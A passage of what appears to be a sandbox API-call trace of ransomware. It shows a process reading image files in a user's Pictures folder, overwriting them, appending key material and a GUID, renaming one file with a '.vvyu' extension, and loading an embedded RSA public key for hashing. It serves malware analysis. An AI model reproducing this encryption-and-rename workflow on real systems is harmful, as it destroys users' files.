Size=0x40) returned 0x2af34f8 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f78 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0190.888] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f60 [0190.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.889] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2aeb988 [0190.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0190.889] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.890] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeb988 | out: hHeap=0x2c0000) returned 1 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f60 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5f78 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0190.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.892] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.892] GetCurrentThreadId () returned 0x5d8 [0190.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5418 [0190.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.893] GetCurrentThreadId () returned 0x5d8 [0190.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f90 [0190.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f78 [0190.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f60 [0190.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f18 [0190.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fa8 [0190.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0190.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0190.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5fc0 [0190.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f00 [0190.897] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f78 [0190.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2aeb988 [0190.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0190.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0190.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2aebb98 [0190.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af3f88 [0190.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.899] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aebb98 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fa8 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af34f8 | out: hHeap=0x2c0000) returned 1 [0190.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeb988 | out: hHeap=0x2c0000) returned 1 [0190.902] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.904] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.904] WriteFile (in: hFile=0x584, lpBuffer=0x2ae6ea0*, nNumberOfBytesToWrite=0x4adf, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae6ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x4adf, lpOverlapped=0x0) returned 1 [0190.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ea0 | out: hHeap=0x2c0000) returned 1 [0190.905] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x4ae4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.905] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.906] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.907] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.907] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.907] CloseHandle (hObject=0x584) returned 1 [0190.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0190.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0190.908] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.909] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\LIaR.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\liar.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\LIaR.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\liar.gif.vvyu")) returned 1 [0190.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.910] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.913] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5374010, ftCreationTime.dwHighDateTime=0x1d89b24, ftLastAccessTime.dwLowDateTime=0x56a99530, ftLastAccessTime.dwHighDateTime=0x1d8a35d, ftLastWriteTime.dwLowDateTime=0x56a99530, ftLastWriteTime.dwHighDateTime=0x1d8a35d, nFileSizeHigh=0x0, nFileSizeLow=0xb205, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Lv2Axv.jpg", cAlternateFileName="")) returned 1 [0190.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af34f8 [0190.913] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0190.913] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af34f8 | out: hHeap=0x2c0000) returned 1 [0190.913] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\Lv2Axv.jpg") returned=".jpg" [0190.913] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\Lv2Axv.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\lv2axv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.914] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=45573) returned 1 [0190.914] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.918] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb1df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.918] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.921] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.921] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xb205, lpOverlapped=0x0) returned 1 [0190.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.922] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.922] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.923] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.923] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.924] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, 